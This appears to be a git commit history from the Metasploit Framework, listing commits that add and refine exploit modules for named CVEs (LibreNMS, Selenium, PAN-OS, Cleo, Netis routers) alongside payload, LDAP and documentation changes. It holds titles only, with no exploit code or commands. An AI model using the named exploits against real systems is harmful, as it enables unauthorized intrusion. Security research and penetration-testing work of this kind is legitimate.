Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2025-01-24 16:15:16 +00:00
Jack Heysel
105559e771
Remove typo
2025-01-24 07:35:12 -08:00
sfewer-r7
de6b14e506
change how a Sec-WebSocket-Key is computed to make connect_ws be spec compliant
2025-01-24 14:46:52 +00:00
Christophe De La Fuente
25bd5d736c
Fix comparision case for service name hostname
2025-01-24 14:26:58 +01:00
Christophe De La Fuente
45e6daea7d
Use the correct UUID when using EsfRPC with lsarpc namedpipe
2025-01-24 11:01:15 +01:00
Jack Heysel
b8f82e0fe4
Add ESC4 detection to ldap_esc_vulnerable_cert_finder module
2025-01-23 19:13:13 -08:00
h00die
e01f33f7a5
revert f5145de to make function work on target, not locally
2025-01-23 16:56:26 -05:00
jenkins-metasploit
d8e9093e64
automatic module_metadata_base.json update
2025-01-23 20:32:51 +00:00
Brendan
378ac00c7d
Merge pull request #19750 from dledda-r7/feat/prepend-multi-arch
...
Fix Prepends in Linux Payloads
2025-01-23 14:26:44 -06:00
jenkins-metasploit
ed64b57b6f
automatic module_metadata_base.json update
2025-01-23 19:28:55 +00:00
Martin Sutovsky
34f3957aea
Land #19772 , adding module for CraftCMS FTP template exploit
2025-01-23 20:21:17 +01:00
jheysel-r7
1939257618
Merge pull request #19825 from adfoster-r7/add-documentation-for-ldap-test-system
...
Add documentation for ldap test system
2025-01-23 06:29:14 -08:00
Martin Sutovsky
92ebabf168
Ivanti scanner template
2025-01-23 11:38:49 +01:00
Metasploit
3131b6b02d
Bump version of framework to 6.4.47
2025-01-23 03:32:43 -06:00
adfoster-r7
4767f5e457
Add documentation for ldap test system
2025-01-23 01:34:04 +00:00
h00die
af12460274
wrap tomcat dpkg command and rex version
2025-01-22 17:06:48 -05:00
Spencer McIntyre
a6ec468063
Use the BASE_DN and don't require QUERY_ATTRIBUTES
2025-01-22 16:15:52 -05:00
dwelch-r7
cfaaa16d91
Merge pull request #19820 from adfoster-r7/pin-concurrent-ruby-version
...
Pin concurrent-ruby version
2025-01-21 12:17:04 +00:00
adfoster-r7
e1ffe82145
Pin concurrent-ruby version
2025-01-21 10:16:37 +00:00
adfoster-r7
c768ec8c83
Update report_vuln to support tracking origin
2025-01-20 22:07:13 +00:00
jenkins-metasploit
0e72da606c
automatic module_metadata_base.json update
2025-01-20 14:43:22 +00:00
Martin Sutovsky
159b2bb6dc
Land #19805 , new module for LibreNMS Authenticated RCE
2025-01-20 15:33:37 +01:00
Takah1ro
393b2167cd
Fix after applied suggestion
2025-01-20 21:24:16 +09:00
Takahiro Yokoyama
39351486e9
Update modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2025-01-20 21:07:34 +09:00
Takah1ro
b0d5cf1f6a
Stage the command to a file if failed to limit
2025-01-19 10:43:20 +09:00
Takah1ro
22523badab
Update login check
2025-01-19 08:11:44 +09:00
Takah1ro
54bd55b186
Update vulnerable version
2025-01-18 10:18:10 +09:00
Takah1ro
c93609eaa7
Lint formatting and make payload shorter
2025-01-18 08:56:15 +09:00
Takahiro Yokoyama
fc005f5624
Update modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2025-01-18 08:49:13 +09:00
h00die
ae5f0e8689
guard Rex::Version.new against crashes on local modules
2025-01-17 16:10:23 -05:00
Takah1ro
70146e52d9
Make payload shorter
2025-01-17 22:11:08 +09:00
Takah1ro
ca304ae5c4
Avoid to split payload
2025-01-17 21:21:48 +09:00
dledda-r7
763ff9275e
fix(payloads): fix x86 prepends
2025-01-17 02:04:13 -05:00
Takah1ro
61b10a44a3
Update default wait time
2025-01-17 12:43:34 +09:00
Takah1ro
8978486895
Use retry_until_truthy
2025-01-17 08:59:06 +09:00
Takah1ro
4f4a0f9cd5
Add nil check
2025-01-17 08:48:33 +09:00
Takah1ro
9540837b37
Use keep_cookies
2025-01-17 08:46:30 +09:00
Takah1ro
f9204fe691
Update message about delete devices for clarity
2025-01-17 08:21:33 +09:00
Takahiro Yokoyama
23a9695ea5
Update modules/exploits/linux/http/librenms_authenticated_rce_cve_2024_51092.rb
...
Co-authored-by: dwelch-r7 <Dean_Welch@rapid7.com >
2025-01-17 08:17:49 +09:00
Spencer McIntyre
897f8c890a
Merge pull request #19808 from jheysel-r7/fix_ms_icpr_esc15_patch
...
Fix icpr_cert to print an error when ESC15 is patched
2025-01-16 22:44:33 +00:00
h00die
79ac873dfa
fix loadmaster 2024 cve ref
2025-01-16 16:32:00 -05:00
h00die
7eee3f0be8
fix loadmaster 2024 check method crash
2025-01-16 16:30:45 -05:00
jheysel-r7
f7554d2467
Update lib/msf/core/exploit/remote/ms_icpr.rb
2025-01-16 09:36:30 -08:00
jheysel-r7
b5a116f85e
Update lib/msf/core/exploit/remote/ms_icpr.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2025-01-16 09:25:33 -08:00
Takah1ro
99bfc21d5f
Revert
2025-01-16 22:06:40 +09:00
Takah1ro
5087e460b0
Split long line
2025-01-16 21:57:54 +09:00
Takah1ro
8b127d3afa
Add warning when all RETRY will ran out
2025-01-16 21:19:19 +09:00
adfoster-r7
1d748d73a1
Merge pull request #19807 from msutovsky-r7/typo_docs_fix
...
Fixed type in documentation Common Coding Mistakes
2025-01-16 12:06:54 +00:00
Metasploit
bc425a0df8
Bump version of framework to 6.4.46
2025-01-16 04:57:39 -06:00
jenkins-metasploit
5fa61b6df9
automatic module_metadata_base.json update
2025-01-16 10:00:00 +00:00
Martin Sutovsky
99e95dd760
Land #19752 , Prometheus pprof endpoint check
2025-01-16 10:50:58 +01:00
Takah1ro
4e53c967c2
Update message
2025-01-16 12:59:18 +09:00
h00die
1e7c86c947
fix prometheus ppof check
2025-01-15 17:54:20 -05:00
adfoster-r7
9c98804d58
Merge pull request #19800 from zeroSteiner/fix/dns/caching-incompatible-answers
...
Carry on if the record can't be cached
2025-01-15 22:45:50 +00:00
jenkins-metasploit
6a4844bf0d
automatic module_metadata_base.json update
2025-01-15 21:13:37 +00:00
Brendan
9bd8590b99
Merge pull request #19793 from sfewer-r7/CVE-2024-55956
...
Cleo LexiCom, VLTrader, and Harmony Unauthenticated Remote Code Execution (CVE-2024-55956)
2025-01-15 15:04:45 -06:00
Jack Heysel
2254a1f213
Responded to comments
2025-01-15 09:22:44 -08:00
Spencer McIntyre
e425bba900
Catch the exception and log a message
2025-01-15 16:59:07 +00:00
jenkins-metasploit
8344c2c624
automatic module_metadata_base.json update
2025-01-15 15:50:37 +00:00
msutovsky-r7
0630187870
Land #19798 , fixing link and code cleanup
...
Fix nsfw link in mssql_clr_payload, and rubocop the module
2025-01-15 16:41:34 +01:00
Takah1ro
01ea602675
Update version check message
2025-01-15 21:41:25 +09:00
Takah1ro
3298880c21
Add version check
2025-01-15 21:39:54 +09:00
adfoster-r7
de0cde7634
Merge pull request #19809 from dwelch-r7/mark-ldap-session-as-interactive
...
Add LDAP to the set of interactive session types
2025-01-15 12:08:15 +00:00
Takah1ro
12a2cdf3bf
Remove store_valid_credential
2025-01-15 21:08:08 +09:00
Takah1ro
d21be52b71
Lint formatting
2025-01-15 21:07:10 +09:00
Takahiro Yokoyama
0bdee81bcc
Apply suggestions from code review
...
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com >
2025-01-15 21:04:14 +09:00
Dean Welch
4c478a5b23
Add LDAP to the set of interactive session types
2025-01-15 09:51:35 +00:00
dledda-r7
e39af38c73
fix(payloads): updating prepend mixin in payloads
2025-01-15 04:32:42 -05:00
dledda-r7
4565a04510
fix(payloads): updating prepend mixin in payloads
2025-01-14 09:31:03 -05:00
Jack Heysel
42abf6be5b
Fix icpr_cert to error when ESC15 is patched
2025-01-13 17:51:21 -08:00
Martin Sutovsky
278dd00845
Fixed type in documentation Common Coding Mistakes
2025-01-13 12:14:27 +01:00
msutovsky-r7
c494ad4f80
Land #19723 , Merge pull request from cgranleese-r7/add-payload-testing-documentation
...
Adds payload testing documentation
2025-01-13 09:16:12 +01:00
Takah1ro
10be7a80cf
Update document
2025-01-13 10:56:16 +09:00
Takah1ro
2de30c3a0f
Minor fix
2025-01-12 21:35:33 +09:00
Takah1ro
0e1a22aa3b
Update Description and print more info
2025-01-12 13:06:46 +09:00
Takah1ro
93bb7fa6c5
Add LibreNMS Authenticated RCE (CVE-2024-51092)
2025-01-12 12:28:07 +09:00
Spencer McIntyre
db3699a516
Carry on if the record can't be cached
2025-01-10 15:45:49 -05:00
Jack Heysel
18be9fc101
Added suggestions from jvoisin
2025-01-10 11:45:40 -08:00
Jack Heysel
d52593f231
Rubocop fix
2025-01-10 10:42:50 -08:00
Jack Heysel
928634b9fe
Minor fixes and improvements
2025-01-10 10:26:17 -08:00
jheysel-r7
37dff525a5
Merge pull request #5 from Chocapikk/craftcms-exploit-fix
...
Fix and enhance CraftCMS FTP exploit module
2025-01-10 09:45:56 -08:00
Chocapikk
b7d922f471
Fix and enhance CraftCMS FTP exploit module
2025-01-10 18:16:11 +01:00
msutovsky-r7
982401e803
Land #19794 , Add docs for Stance and Passive metadata
...
Add docs for Stance and Passive metadata
2025-01-10 15:40:59 +01:00
dledda-r7
edf4fca476
chore: rubocop format fix
2025-01-10 07:55:34 -05:00
jenkins-metasploit
d84eb3212f
automatic module_metadata_base.json update
2025-01-10 02:40:09 +00:00
jheysel-r7
58c359293d
Merge pull request #19796 from h00die/move_acronis
...
move acronis_cyber_protect_unauth_rce_cve_2022_3405 inside the http folder
2025-01-09 18:33:22 -08:00
h00die
ce9f1b9101
fix nsfw link
2025-01-09 21:23:38 -05:00
h00die
3513c6c4db
fix nsfw link
2025-01-09 20:58:40 -05:00
jenkins-metasploit
45fb4a7b67
automatic module_metadata_base.json update
2025-01-10 01:09:17 +00:00
jheysel-r7
5374c7b362
Merge pull request #19676 from h00die/needrestart
...
Ubuntu needrestart LPE (CVE-2024-48990)
2025-01-09 17:02:54 -08:00
jenkins-metasploit
351db34940
automatic module_metadata_base.json update
2025-01-10 00:51:11 +00:00
jheysel-r7
a6ba7bf9c2
Merge pull request #19734 from h00die/runc_arch
...
arch linux compatibility for runc priv esc
2025-01-09 16:45:02 -08:00
h00die
1aba53274f
move acronis_cyber_protect_unauth_rce_cve_2022_3405 inside the http folder
2025-01-09 16:32:42 -05:00
h00die
1a839c0b33
move acronis_cyber_protect_unauth_rce_cve_2022_3405 inside the http folder
2025-01-09 16:30:51 -05:00
h00die
437c9fc99e
review of ubuntu_needrestart_lpe
2025-01-09 16:23:09 -05:00
Jack Heysel
23db148aa9
Add check for nosuid
2025-01-09 09:59:09 -08:00
Jack Heysel
6d173c63a7
Updated wording
2025-01-09 09:10:55 -08:00
Jack Heysel
2c86d7661a
Add docs for Stance and Passive metadata
2025-01-09 09:00:17 -08:00
jenkins-metasploit
ed292a971f
automatic module_metadata_base.json update
2025-01-09 16:23:41 +00:00
Diego Ledda
5cfaf4871d
Land #19738 , Pandora FMS auth RCE (CVE-2024-11320)
...
Land #19738 , Pandora FMS auth RCE (CVE-2024-11320)
2025-01-09 17:16:58 +01:00
sfewer-r7
4d42c7878e
improve the regex by removing the unnecessary word boundrys, and add a non matching group for the product name. Thanks jvoisin
2025-01-09 11:43:58 +00:00
sfewer-r7
e340e3ea6c
favor a case statement over the if/elsif blocks (thanks jvoisin).
2025-01-09 11:34:13 +00:00
Stephen Fewer
98f9045e54
improve comment (thanks jvoisin)
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2025-01-09 11:29:04 +00:00
Stephen Fewer
43792457e5
improve comment (thanks jvoisin)
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2025-01-09 11:28:48 +00:00
Metasploit
412a1ba222
Bump version of framework to 6.4.45
2025-01-09 03:33:08 -06:00
jenkins-metasploit
6ac1d1e7bb
automatic module_metadata_base.json update
2025-01-08 13:00:33 +00:00
Diego Ledda
b2e28efa48
Land #19781 , Add Selenium file read auxiliary module
...
Land #19781 , Add Selenium file read auxiliary module
2025-01-08 13:54:04 +01:00
jenkins-metasploit
eb71ce1057
automatic module_metadata_base.json update
2025-01-08 12:52:55 +00:00
Diego Ledda
fea171357a
Land #19771 , Add Selenium Firefox RCE module (CVE-2022-28108)
...
Land #19771 , Add Selenium Firefox RCE module (CVE-2022-28108)
2025-01-08 13:44:33 +01:00
Takah1ro
3fc85e103e
Rubocop formatting
2025-01-08 21:09:22 +09:00
Takahiro Yokoyama
f0d747ce6f
Update modules/auxiliary/gather/selenium_file_read.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2025-01-08 21:01:50 +09:00
Takah1ro
296d3c92fc
chore: removing PAYLOAD from DefaultOptions
2025-01-08 13:04:08 +09:00
jheysel-r7
e62010c592
Merge pull request #19780 from adfoster-r7/ensure-module-details-are-marked-as-ready
...
Ensure module details are marked as ready
2025-01-07 17:39:58 -08:00
jenkins-metasploit
aa8cf01aef
automatic module_metadata_base.json update
2025-01-08 01:30:41 +00:00
jheysel-r7
0ff2835bb7
Merge pull request #19770 from h00die-gr3y/netis-unauth-rce
...
Netis Router Exploit Chain Reactor [CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457]
2025-01-07 17:24:37 -08:00
h00die-gr3y
0c723b858f
Added attackerkb references
2025-01-07 20:33:41 +00:00
jheysel-r7
d560a3202e
Merge pull request #19751 from zeroSteiner/fix/issue/19744
...
Fix missing attributes on LDAP SSL sockets
2025-01-07 09:47:53 -08:00
jenkins-metasploit
2632da7334
automatic module_metadata_base.json update
2025-01-07 17:07:36 +00:00
jheysel-r7
f475b9d4d6
Merge pull request #19749 from zeroSteiner/fix/mod/ntp_nak_to_the_future
...
Fix ntp_nak_to_the_future
2025-01-07 09:01:15 -08:00
Spencer McIntyre
e5e06572fb
Add documentation to the module with testing steps
2025-01-07 09:14:08 -05:00
adfoster-r7
dac7c3965e
Merge pull request #19792 from adfoster-r7/update-add-additional-library-dependencies-for-ruby-3.4-support
...
Add additional library dependencies for Ruby 3.4 support
2025-01-07 12:36:47 +00:00
jenkins-metasploit
c7c7338ff6
automatic module_metadata_base.json update
2025-01-07 10:17:16 +00:00
Diego Ledda
7ead96a740
Land #19769 , Add Selenium Chrome RCE module (CVE-2022-28108)
...
Land #19769 , Add Selenium Chrome RCE module (CVE-2022-28108)
2025-01-07 11:10:37 +01:00
Diego Ledda
0f71c896e5
chore: removing PAYLOAD from DefaultOptions
2025-01-07 10:47:04 +01:00
H00die.Gr3y
9a6d074463
Apply suggestions from code review
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2025-01-07 09:25:41 +01:00
jenkins-metasploit
43af3dbe3e
automatic module_metadata_base.json update
2025-01-07 03:04:28 +00:00
jheysel-r7
817557c589
Merge pull request #19614 from vultza/onedev-file-read
...
OneDev Unauthenticated Arbitrary File Read (CVE-2024-45309)
2025-01-06 18:57:35 -08:00
Jack Heysel
08c84924f0
Rubocop fixes
2025-01-06 18:48:26 -08:00
jheysel-r7
7f5cf5edac
Change CheckCode from Appears to Vulnerable
2025-01-06 18:37:56 -08:00
Takah1ro
2be1781aa7
Remove unnecessary version check
2025-01-07 08:44:53 +09:00
adfoster-r7
2c96ecff6a
Add additional library dependencies for Ruby 3.4 support
2025-01-06 16:41:23 +00:00
jenkins-metasploit
98b5eabd48
automatic module_metadata_base.json update
2025-01-06 16:23:53 +00:00
Diego Ledda
289e95d530
Land #19367 , fix ARM stager restore r0 in loop
...
Land #19367 , fix ARM stager restore r0 in loop
2025-01-06 17:14:47 +01:00
dwelch-r7
e801720c92
Land #19767 , Support Ruby 3.4
2025-01-06 16:13:19 +00:00
Takah1ro
bca9a5fe61
Update check
2025-01-06 19:43:48 +09:00
sfewer-r7
0df004cee7
check for nil here, before we check for the end cdata tag (resolves a linting warning)
2025-01-06 10:41:02 +00:00
Takah1ro
d788a3baf7
Update check
2025-01-06 19:37:31 +09:00
Takah1ro
474f5426b5
Update check
2025-01-06 19:11:27 +09:00
cgranleese-r7
aa74e0c97e
Adds payload testing documentation
2025-01-06 09:44:29 +00:00
sfewer-r7
3ff685b70e
fix three typos
2025-01-06 09:42:21 +00:00
sfewer-r7
7fd59b9683
fix date format
2025-01-06 09:26:44 +00:00
sfewer-r7
fe7334fae2
add in CVE-2024-55956 exploit
2025-01-06 09:26:44 +00:00
Takah1ro
11c1b726cf
Improve
...
* add timeout option
* print session info
* apply suggestions (#19769 )
2025-01-04 11:54:31 +09:00
Takah1ro
43294df0dd
Add a message about what is failing
2025-01-04 10:21:43 +09:00
Takah1ro
710ae1198a
Apply suggestions from #19769
2025-01-04 10:12:57 +09:00
Takah1ro
e2bf2162dc
Update failure
2025-01-04 09:13:41 +09:00
Takah1ro
6cbb30c91a
Avoid the code nesting
2025-01-04 09:11:24 +09:00
Takah1ro
bf643041c3
Rubocop formatting
2025-01-04 08:46:12 +09:00
Takahiro Yokoyama
3a28df6b32
Apply suggestions from code review
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2025-01-04 08:41:56 +09:00
vultza
6d206f80f1
check method improvement
2025-01-02 17:57:07 +00:00
Martin Sutovsky
05bd95c23f
Init new method for Unix fileless ELF execution
2025-01-02 12:56:55 +01:00
Metasploit
9b75fc50ec
Bump version of framework to 6.4.44
2025-01-02 03:33:04 -06:00
h00die
1462875819
remove UA updater python script in favor of ruby script
2025-01-01 22:39:00 -05:00
h00die
967c9b36e2
update permissions
2025-01-01 22:35:24 -05:00
h00die
d0a4d57883
weekly updater action
2025-01-01 22:35:19 -05:00
Takah1ro
ec8dba87fb
Update failure and print about session id
2025-01-02 11:30:03 +09:00
Takah1ro
3b947cf1c5
Update vulnerable version
2025-01-02 09:57:00 +09:00
jenkins-metasploit
45a36605f2
automatic module_metadata_base.json update
2025-01-01 19:59:49 +00:00
adfoster-r7
63e4df36b3
Merge pull request #19774 from h00die/update_joomla_wordpress
...
Update joomla wordpress stuff
2025-01-01 19:53:30 +00:00
adfoster-r7
6b805bfdd6
Merge pull request #19755 from smashery/ua-strings-dec24
...
Updated user agent strings December 2024
2025-01-01 19:48:25 +00:00
Takah1ro
bb138e49d6
Lint formatting
2025-01-01 12:07:02 +09:00
Takah1ro
9d664a36f0
Add Selenium file read auxiliary module
2025-01-01 11:55:35 +09:00
adfoster-r7
a422d065c0
Ensure module details are marked as ready
2024-12-31 12:59:29 +00:00
jheysel-r7
22c16975b6
Merge pull request #19762 from adfoster-r7/update-docs-dependencies-rexml
...
Update docs dependency rexml
2024-12-30 10:58:03 -08:00
jheysel-r7
9ae5027f3a
Merge pull request #19674 from zeroSteiner/fix/bump-multi/2024-11-22
...
Bump the ruby_smb and rex-socket gems
2024-12-30 10:52:47 -08:00
jenkins-metasploit
4ab9664cc6
automatic module_metadata_base.json update
2024-12-30 18:35:19 +00:00
jheysel-r7
e70b6c777f
Merge pull request #19663 from sfewer-r7/CVE-2024-0012
...
Exploit module for PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474)
2024-12-30 10:29:10 -08:00
jenkins-metasploit
ea00aa6579
automatic module_metadata_base.json update
2024-12-30 17:13:12 +00:00
jheysel-r7
f436f44d83
Merge pull request #19698 from h00die/obsidian
...
obsidian community plugin persistence module
2024-12-30 09:06:58 -08:00
Takah1ro
38d8d35dc5
Update doc
2024-12-30 13:50:13 +09:00
Takah1ro
bbc282e90c
Improve check
2024-12-30 13:36:15 +09:00
Takah1ro
6e0c945a42
Improve check for version 4
2024-12-30 13:00:25 +09:00
adfoster-r7
78c37a4c05
Merge pull request #19773 from h00die/update_oracle_docs
...
update oracle install instructions
2024-12-29 23:56:35 +00:00
h00die
cf7d2584ba
update wp themes+plugins
2024-12-29 17:31:55 -05:00
h00die
87494a0958
update modules for inclusion into wordpress updater
2024-12-29 17:25:12 -05:00
h00die
03ddb8990e
sort alphabetically
2024-12-29 15:57:23 -05:00
h00die
df0aa98e8b
update oracle install instructions
2024-12-29 15:16:33 -05:00
h00die-gr3y
862f2ee6c6
Added documentation and some small module updates
2024-12-29 20:05:05 +00:00
h00die-gr3y
8a1dd2b1ff
fourth release module
2024-12-29 11:33:52 +00:00
h00die-gr3y
0d823fc9a2
third release module
2024-12-29 10:41:36 +00:00
Takah1ro
68ae0d40ea
Add timeout option
2024-12-29 13:02:32 +09:00
Takah1ro
e4111cdc97
Update to use FETCH_DELETE
2024-12-29 12:33:39 +09:00
Takah1ro
86bd1c2938
Minor improve
...
* enable fetch_delete
* avoid using single quotes
* update doc
2024-12-29 12:19:19 +09:00
Takah1ro
af432a3b72
Improve stability
2024-12-29 12:00:09 +09:00
Jack Heysel
94507655ae
WIP CraftCMS FTP Template exploit
2024-12-28 18:56:47 -08:00
Takah1ro
cb34508321
Avoid using single quote in payload
2024-12-28 20:09:18 +09:00
Takah1ro
02ad81066d
Add cleanup
2024-12-28 18:04:56 +09:00
Takahiro Yokoyama
c7d7407179
Update modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
...
Co-authored-by: bcoles <bcoles@gmail.com >
2024-12-28 18:04:09 +09:00
Takah1ro
90d9bb769d
Update vulnerable version
2024-12-28 15:53:31 +09:00
Takah1ro
43230b02a5
Review fix
...
* use send_request_cgi
* add check if sudo without password possible
* base64 encode payload
2024-12-28 15:42:15 +09:00
Takah1ro
6577a18abb
Add response check
2024-12-28 15:04:35 +09:00
Takahiro Yokoyama
9f20c575e5
Update modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
...
Improve version detection messaging
Co-authored-by: bcoles <bcoles@gmail.com >
2024-12-28 14:40:44 +09:00
Takah1ro
7ecc1cb87b
Update vulnerable version
2024-12-28 14:39:24 +09:00
Takah1ro
9bfccc4293
Review fix
...
* add check if sudo without password possible
* base64 encode payload
2024-12-28 14:02:59 +09:00
Takah1ro
6c5952d3b6
Use send_request_cgi
2024-12-28 13:34:10 +09:00
Takah1ro
340d4bcd58
Add selenium firefox rce module
2024-12-28 12:27:18 +09:00
Takah1ro
e3d68d4164
Update author and fix version detection
2024-12-28 11:18:41 +09:00
h00die-gr3y
677e8ec9dd
updated vulnerable firmware versions in description
2024-12-27 22:12:51 +00:00
h00die-gr3y
7ca7d71ab4
second release module
2024-12-27 21:55:44 +00:00
h00die-gr3y
d3b4c5becb
initial release module
2024-12-27 20:36:31 +00:00
vultza
814cdb354f
fix typo
2024-12-27 14:45:05 +00:00
Takah1ro
38e886f4b6
Update payload string formatting
2024-12-27 21:58:42 +09:00
Takah1ro
e17d7cd161
Minor fix
2024-12-27 21:50:26 +09:00
Takah1ro
64b1832567
Update not to use selenium-webdriver
2024-12-27 13:00:20 +09:00
Takah1ro
390f551df7
Fix EDB
2024-12-27 00:10:01 +09:00
Takah1ro
3defb63763
Fix CVE format
2024-12-26 23:57:41 +09:00
Takah1ro
82ebdf1f9d
Improve docs
2024-12-26 23:54:47 +09:00
Takah1ro
acbcd9f3b1
Fix ubuntu version
2024-12-26 23:51:40 +09:00
Takah1ro
06af9b0b3d
Add selenium chrome rce module
2024-12-26 23:44:11 +09:00
adfoster-r7
293598d924
Support Ruby 3.4
2024-12-26 13:47:48 +00:00
Metasploit
d86136c8ef
Bump version of framework to 6.4.43
2024-12-26 03:32:57 -06:00
adfoster-r7
cdadf68a98
Update docs dependencies rexml
2024-12-23 23:06:09 +00:00
h00die-gr3y
58c979dc08
updated with correct privileged setting
2024-12-23 19:45:29 +00:00
jheysel-r7
a133b58665
Merge pull request #19763 from adfoster-r7/fix-flaky-windows-version-detection
...
Fix flaky windows version detection
2024-12-23 10:52:22 -08:00
adfoster-r7
a65135e68b
Fix flaky windows version detection
2024-12-23 15:51:43 +00:00
jenkins-metasploit
66f6cac472
automatic module_metadata_base.json update
2024-12-23 11:36:32 +00:00
Martin Sutovsky
789f7cfcd1
Land #19731 , new feature for recognizing broken SMB session and managing them
2024-12-23 12:06:49 +01:00
h00die-gr3y
7c8116a2cb
Third release of module + Documentation
2024-12-22 11:41:05 +00:00
h00die-gr3y
cf5b26dd61
Second release after testing multiple Pandora FMS versions
2024-12-20 20:40:04 +00:00
Spencer McIntyre
6eb2f6170c
Merge pull request #19756 from smashery/dns_reorder
...
Add the ability to reorder DNS entries
2024-12-20 11:50:38 -05:00
dledda-r7
a27024eb1f
fix: updating aarch64/shell to use the new prepends mixin
2024-12-20 10:18:25 -05:00
dledda-r7
ead6af8cbc
feat: add PrependSetresuid for linux/aarch64
2024-12-20 10:16:46 -05:00
dledda-r7
aca6613a3e
feat: add PrependSetreuid for linux/aarch64
2024-12-20 09:46:38 -05:00
Spencer McIntyre
41460077a4
Bump the ruby_smb and rex-socket gems
2024-12-20 09:09:55 -05:00
Spencer McIntyre
a68b9dc8cd
Remove the old NTPSymmetric model
...
It is no longer in use by any modules. It has been superseded by
NTPHeader.
2024-12-20 08:57:24 -05:00
Spencer McIntyre
cfb7207a85
Fix the ntp_nak_to_the_future module
2024-12-20 08:57:24 -05:00
dledda-r7
30e13c9040
fix: fix mismatch between prepend name and stub in linux/armle
2024-12-20 08:14:09 -05:00
dledda-r7
647972b7c8
feat: add PrependSetuid for linux/aarch64
2024-12-20 08:13:09 -05:00
adfoster-r7
40de61f447
Merge pull request #19758 from adfoster-r7/update-metasploit-dns-docs-syntax-highlight
...
Update metasploit dns docs syntax highlight
2024-12-20 11:44:49 +00:00
dledda-r7
4d304c65b5
fix: remove x64 directory flatting in Linux payloads
2024-12-20 04:15:41 -05:00
adfoster-r7
78f74a7099
Update metasploit dns docs syntax highlight
2024-12-20 02:12:49 +00:00
Ashley Donaldson
ee4f01f0a4
Ability to reorder DNS entries
2024-12-20 11:02:38 +11:00
jenkins-metasploit
b7bb75046d
automatic module_metadata_base.json update
2024-12-19 22:56:46 +00:00
Brendan
51bbc76c79
Land #19748 , Add the timeroast module
...
Add the timeroast module
2024-12-19 16:50:09 -06:00
Spencer McIntyre
a365d17055
Set the default NTP port
...
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-12-19 17:12:39 -05:00
Ashley Donaldson
4eb01d7395
Updated user agent strings December 2024
2024-12-20 08:56:07 +11:00
jenkins-metasploit
e0f79d806d
automatic module_metadata_base.json update
2024-12-19 21:00:41 +00:00
Spencer McIntyre
d0cb6c1e2d
Merge pull request #19741 from dledda-r7/remove-reverse-hop-http
...
Remove reverse_hop_http payload
2024-12-19 15:54:33 -05:00
jenkins-metasploit
a6dc0bf8a7
automatic module_metadata_base.json update
2024-12-19 20:51:10 +00:00
Spencer McIntyre
c77ccb1203
Merge pull request #19740 from dledda-r7/remove-reverse-https-proxy
...
Removing reverse_https_proxy payload
2024-12-19 15:43:05 -05:00
h00die
78984e467f
add check for prometheus pprof endpoints
2024-12-19 15:40:51 -05:00
Spencer McIntyre
c8100375d9
Fix missing attributes on SSL sockets
2024-12-19 14:52:08 -05:00
Brendan
227143efa1
Land #19746 , Added Server 2025 to Windows version constants
...
Added Server 2025 to Windows version constants
2024-12-19 11:24:19 -06:00
dledda-r7
753447c7f7
fix: updating ppc/shell to use the new mixin structure
2024-12-19 12:13:55 -05:00
dledda-r7
0d632777fc
fix: splitting linux prepends to arch-specific mixins
2024-12-19 10:54:29 -05:00
Spencer McIntyre
56152fd359
Add docs for the new timeroast module
2024-12-19 09:29:05 -05:00
Spencer McIntyre
03f399ee9a
Initial commit of the timeroast module
2024-12-19 09:29:05 -05:00
Spencer McIntyre
60fd582fb2
Add timeroast support to #identify_hash
2024-12-19 09:29:05 -05:00
Spencer McIntyre
04c9106303
Add the spec for the new int range option
2024-12-19 09:29:05 -05:00
Spencer McIntyre
8ea779af56
Add the OptIntRange class
2024-12-19 09:29:05 -05:00
Spencer McIntyre
72c7f4ace2
Add the NTPHeader specs
2024-12-19 09:29:05 -05:00
Metasploit
e2a248e9df
Bump version of framework to 6.4.42
2024-12-19 03:32:40 -06:00
jenkins-metasploit
c70043f842
automatic module_metadata_base.json update
2024-12-18 20:51:38 +00:00
Brendan
7ddffc790c
Merge pull request #19460 from gardnerapp/game_overlay
...
Land #19460 , CVE-2023-2640, CVE-2023-32629 Game Overlay Ubuntu Privilege Escalation
2024-12-18 14:44:57 -06:00
Spencer McIntyre
048038f44a
Add NTP mode constants
2024-12-18 15:33:38 -05:00
Spencer McIntyre
f4dc4a8220
Add the NTPHeader structure
2024-12-18 15:33:33 -05:00
bwatters-r7
b7f477172f
Update docs to reflect recent changes
2024-12-18 14:08:10 -06:00
jenkins-metasploit
37eaa29df6
automatic module_metadata_base.json update
2024-12-18 12:41:54 +00:00
adfoster-r7
2001469d02
Merge pull request #19742 from sjanusz-r7/TeamCity-is-capitalized
...
Capitalize TeamCity correctly
2024-12-18 12:35:12 +00:00
Martin Sutovsky
531ed162db
Land #19733 , exploit module for CVE-2022-40471 - unauthenticated RCE
2024-12-18 12:44:34 +01:00
h00die-gr3y
2fe0b35384
update2 based on comments
2024-12-18 08:34:10 +00:00
h00die-gr3y
2abde4c923
update based on comments
2024-12-18 08:32:06 +00:00
Ivan Nikolskiy
cdc51228c1
Update reverse_tcp.rb
2024-12-18 07:26:37 +00:00
Ashley Donaldson
747013615f
Added Server 2025 to Windows version constants
2024-12-18 12:46:07 +11:00
bwatters-r7
59229ee612
Update payload name, fix payload escapes & quotation, add unix cmd support
2024-12-17 16:52:24 -06:00
sfewer-r7
edf8d186f7
use the HttpClient cookie jar. Thank you @jheysel-r7 for this improvement.
2024-12-17 17:47:00 +00:00
Stephen Fewer
c25b3ceb03
typo 4
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-12-17 17:26:46 +00:00
Stephen Fewer
51908d6621
typo 3
...
